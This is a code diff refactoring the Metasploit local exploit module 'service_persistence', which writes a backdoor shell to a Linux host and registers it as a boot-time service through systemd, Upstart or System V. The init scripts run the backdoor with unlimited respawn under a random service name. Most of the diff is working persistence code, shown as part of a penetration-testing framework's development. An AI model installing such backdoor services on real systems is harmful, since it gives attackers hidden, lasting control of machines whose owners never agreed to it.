updates round 2

Author: h00die

modules/exploits/linux/local/service_persistence.rb

@@ -3,9 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require 'msf/core'
-require 'msf/core/post/file'
-
 class MetasploitModule < Msf::Exploit::Local
   Rank = ExcellentRanking
 
@@ -47,8 +44,8 @@ def initialize(info = {})
         'Targets'        =>
           [
             ['Auto',     {}],
-            ['System V', { 'runlevel' => '2 3 4 5' }],
-            ['Upstart',  { 'runlevel' => '2345' }],
+            ['System V', { :runlevel => '2 3 4 5' }],
+            ['Upstart',  { :runlevel => '2345' }],
             ['systemd',  {}]
           ],
         'DefaultTarget'  => 0,
@@ -84,13 +81,13 @@ def initialize(info = {})
 
   def exploit
     backdoor = write_shell(datastore['SHELLPATH'])
-    path = backdoor.split(File::SEPARATOR)[0...-1].join('/')
-    file = backdoor.split(File::SEPARATOR)[-1]
+    path = backdoor.split('/')[0...-1].join('/')
+    file = backdoor.split('/')[-1]
     case target.name
     when 'System V'
-      system_v(path, file, target.opts['runlevel'], service_system_exists?('update-rc.d'))
+      system_v(path, file, target.opts[:runlevel], service_system_exists?('update-rc.d'))
     when 'Upstart'
-      upstart(path, file, target.opts['runlevel'])
+      upstart(path, file, target.opts[:runlevel])
     when 'systemd'
       systemd(path, file)
     else
@@ -129,17 +126,17 @@ def write_shell(path)
 
   def systemd(backdoor_path, backdoor_file)
     # https://coreos.com/docs/launching-containers/launching/getting-started-with-systemd/
-    script = "[Unit]\n"
-    script << "Description=Start daemon at boot time\n"
-    script << "After=\n"
-    script << "Requires=\n"
-    script << "[Service]\n"
-    script << "RestartSec=10s\n"
-    script << "Restart=always\n"
-    script << "TimeoutStartSec=5\n"
-    script << "ExecStart=/bin/sh #{backdoor_path}#{File::SEPARATOR}#{backdoor_file}\n"
-    script << "[Install]\n"
-    script << "WantedBy=multi-user.target\n"
+    script = %{[Unit]
+Description=Start daemon at boot time
+After=
+Requires=
+[Service]
+RestartSec=10s
+Restart=always
+TimeoutStartSec=5
+ExecStart=/bin/sh #{backdoor_path}/#{backdoor_file}
+[Install]
+WantedBy=multi-user.target}
 
     service_filename = datastore['SERVICE'] ? datastore['SERVICE'] : Rex::Text.rand_text_alpha(7)
     vprint_status("Writing service: /lib/systemd/system/#{service_filename}.service")
@@ -152,17 +149,17 @@ def systemd(backdoor_path, backdoor_file)
 
   def upstart(backdoor_path, backdoor_file, runlevel)
     # http://blog.terminal.com/getting-started-with-upstart/
-    script = "description \"Start daemon at boot time\"\n"
-    script << "start on filesystem or runlevel [#{runlevel}]\n"
-    script << "stop on shutdown\n"
-    script << "script\n"
-    script << "    cd #{backdoor_path}\n"
-    script << "    echo $$ > /var/run/#{backdoor_file}.pid\n"
-    script << "    exec #{backdoor_file}\n"
-    script << "end script\n"
-    script << "post-stop exec sleep 10\n"
-    script << "respawn\n"
-    script << "respawn limit unlimited\n"
+    script = %{description \"Start daemon at boot time\"
+start on filesystem or runlevel [#{runlevel}]
+stop on shutdown
+script
+    cd #{backdoor_path}
+    echo $$ > /var/run/#{backdoor_file}.pid
+    exec #{backdoor_file}
+end script
+post-stop exec sleep 10
+respawn
+respawn limit unlimited}
 
     service_filename = datastore['SERVICE'] ? datastore['SERVICE'] : Rex::Text.rand_text_alpha(7)
     vprint_status("Writing service: /etc/init/#{service_filename}.conf")
@@ -178,95 +175,96 @@ def system_v(backdoor_path, backdoor_file, runlevel, has_updatercd)
     else
       print_status('Utilizing chkconfig')
     end
-    script = "#!/bin/sh\n"
-    script << "### BEGIN INIT INFO\n"
-    script << "# Provides: service\n"
-    script << "# Required-Start: $network\n"
-    script << "# Required-Stop: $network\n"
-    script << "# Default-Start:     #{runlevel}\n"
-    script << "# Default-Stop:      0 1 6\n"
-    script << "# Short-Description: Start daemon at boot time\n"
-    script << "# Description:       Enable service provided by daemon.\n"
-    script << "### END INIT INFO\n"
-    script << "dir=\"#{backdoor_path}\"\n"
-    script << "cmd=\"#{backdoor_file}\"\n"
-    script << "name=`basename $0`\n"
-    script << "pid_file=\"/var/run/$name.pid\"\n"
-    script << "stdout_log=\"/var/log/$name.log\"\n"
-    script << "stderr_log=\"/var/log/$name.err\"\n"
-    script << "get_pid() {\n"
-    script << "    cat \"$pid_file\"\n"
-    script << "}\n"
-    script << "is_running() {\n"
-    script << "    [ -f \"$pid_file\" ] && ps `get_pid` > /dev/null 2>&1\n"
-    script << "}\n"
-    script << "case \"$1\" in\n"
-    script << "    start)\n"
-    script << "    if is_running; then\n"
-    script << "        echo \"Already started\"\n"
-    script << "    else\n"
-    script << "        echo \"Starting $name\"\n"
-    script << "        cd \"$dir\"\n"
+    script = %{#!/bin/sh
+### BEGIN INIT INFO
+# Provides: service
+# Required-Start: $network
+# Required-Stop: $network
+# Default-Start:     #{runlevel}
+# Default-Stop:      0 1 6
+# Short-Description: Start daemon at boot time
+# Description:       Enable service provided by daemon.
+### END INIT INFO
+dir=\"#{backdoor_path}\"
+cmd=\"#{backdoor_file}\"
+name=`basename $0`
+pid_file=\"/var/run/$name.pid\"
+stdout_log=\"/var/log/$name.log\"
+stderr_log=\"/var/log/$name.err\"
+get_pid() {
+    cat \"$pid_file\"
+}
+is_running() {
+    [ -f \"$pid_file\" ] && ps `get_pid` > /dev/null 2>&1
+}
+case \"$1\" in
+    start)
+    if is_running; then
+        echo \"Already started\"
+    else
+        echo \"Starting $name\"
+        cd \"$dir\"}
+
     if has_updatercd
       script << "        sudo $cmd >> \"$stdout_log\" 2>> \"$stderr_log\" &\n"
     else # CentOS didn't like sudo or su...
       script << "        $cmd >> \"$stdout_log\" 2>> \"$stderr_log\" &\n"
     end
-    script << "        echo $! > \"$pid_file\"\n"
-    script << "        if ! is_running; then\n"
-    script << "            echo \"Unable to start, see $stdout_log and $stderr_log\"\n"
-    script << "            exit 1\n"
-    script << "        fi\n"
-    script << "    fi\n"
-    script << "    ;;\n"
-    script << "    stop)\n"
-    script << "    if is_running; then\n"
-    script << "        echo -n \"Stopping $name..\"\n"
-    script << "        kill `get_pid`\n"
-    script << "        for i in {1..10}\n"
-    script << "        do\n"
-    script << "            if ! is_running; then\n"
-    script << "                break\n"
-    script << "            fi\n"
-    script << "            echo -n \".\"\n"
-    script << "            sleep 1\n"
-    script << "        done\n"
-    script << "        echo\n"
-    script << "        if is_running; then\n"
-    script << "            echo \"Not stopped; may still be shutting down or shutdown may have failed\"\n"
-    script << "            exit 1\n"
-    script << "        else\n"
-    script << "            echo \"Stopped\"\n"
-    script << "            if [ -f \"$pid_file\" ]; then\n"
-    script << "                rm \"$pid_file\"\n"
-    script << "            fi\n"
-    script << "        fi\n"
-    script << "    else\n"
-    script << "        echo \"Not running\"\n"
-    script << "    fi\n"
-    script << "    ;;\n"
-    script << "    restart)\n"
-    script << "    $0 stop\n"
-    script << "    if is_running; then\n"
-    script << "        echo \"Unable to stop, will not attempt to start\"\n"
-    script << "        exit 1\n"
-    script << "    fi\n"
-    script << "    $0 start\n"
-    script << "    ;;\n"
-    script << "    status)\n"
-    script << "    if is_running; then\n"
-    script << "        echo \"Running\"\n"
-    script << "    else\n"
-    script << "        echo \"Stopped\"\n"
-    script << "        exit 1\n"
-    script << "    fi\n"
-    script << "    ;;\n"
-    script << "    *)\n"
-    script << "    echo \"Usage: $0 {start|stop|restart|status}\"\n"
-    script << "    exit 1\n"
-    script << "    ;;\n"
-    script << "esac\n"
-    script << "exit 0\n"
+    script << %{        echo $! > \"$pid_file\"
+        if ! is_running; then
+            echo \"Unable to start, see $stdout_log and $stderr_log\"
+            exit 1
+        fi
+    fi
+    ;;
+    stop)
+    if is_running; then
+        echo -n \"Stopping $name..\"
+        kill `get_pid`
+        for i in {1..10}
+        do
+            if ! is_running; then
+                break
+            fi
+            echo -n \".\"
+            sleep 1
+        done
+        echo
+        if is_running; then
+            echo \"Not stopped; may still be shutting down or shutdown may have failed\"
+            exit 1
+        else
+            echo \"Stopped\"
+            if [ -f \"$pid_file\" ]; then
+                rm \"$pid_file\"
+            fi
+        fi
+    else
+        echo \"Not running\"
+    fi
+    ;;
+    restart)
+    $0 stop
+    if is_running; then
+        echo \"Unable to stop, will not attempt to start\"
+        exit 1
+    fi
+    $0 start
+    ;;
+    status)
+    if is_running; then
+        echo \"Running\"
+    else
+        echo \"Stopped\"
+        exit 1
+    fi
+    ;;
+    *)
+    echo \"Usage: $0 {start|stop|restart|status}\"
+    exit 1
+    ;;
+esac
+exit 0}
 
     service_filename = datastore['SERVICE'] ? datastore['SERVICE'] : Rex::Text.rand_text_alpha(7)
     vprint_status("Writing service: /etc/init.d/#{service_filename}")